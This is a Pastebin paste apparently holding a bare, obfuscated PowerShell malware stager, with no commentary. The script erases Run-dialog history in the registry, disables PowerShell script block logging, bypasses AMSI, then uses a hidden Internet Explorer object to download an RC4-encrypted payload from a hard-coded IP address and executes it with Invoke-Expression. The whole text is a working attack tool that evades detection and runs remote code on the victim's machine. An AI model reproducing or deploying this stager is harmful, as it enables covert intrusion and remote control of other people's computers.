SHARE
TWEET

Untitled

a guest Oct 12th, 2017 49 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. $command = @'
  2. REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
  3. '@
  4. Invoke-Expression -Command:$command
  5. $GrouPPOlIcYSeTtiNGs = [rEf].AsSEMBly.GeTType('System.Management.Automation.Utils')."GeTFIe`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static').GetValue($nuLL);$GroupPOliCYSETtINGs['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;$GrOuPPOLiCYSEttingS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;[ReF].ASSEmBLy.GetTYpe('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GetFiELD('amsiInitFailed','NonPublic,Static').SETVaLUe($NuLL,$true)};[SysteM.NeT.SeRvICEPoiNTManAgeR]::ExPeCt100CONtInue=0;$K=[SYstEm.TEXt.EnCoDiNg]::ASCII.GeTBYTeS('OEF|_^67lU}cdebzLR1fv<*nIA:ox9{~');$R={$D,$K=$ARGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COunt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXOr$S[($S[$I]+$S[$H])%256]}};$ie=New-Object -COM InternetExplorer.Application;$ie.Silent=$True;$ie.visible=$False;$fl=14;$ser='http://108.208.76.40:80';$t='/admin/get.php';$ie.navigate2($ser+$t,$fl,0,$Null,'CF-RAY: Wv01eRhPrIjneDbamWNznOKUenY=');while($ie.busy){Start-Sleep -Milliseconds 100};$ht = $ie.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $ie.document, $Null).InnerHtml;try {$data=[System.Convert]::FromBase64String($ht)} catch {$Null}$IV=$daTa[0..3];$dAta=$dATa[4..$DaTa.lENGtH];-joIn[ChaR[]](& $R $data ($IV+$K))|IEX
RAW Paste Data
Top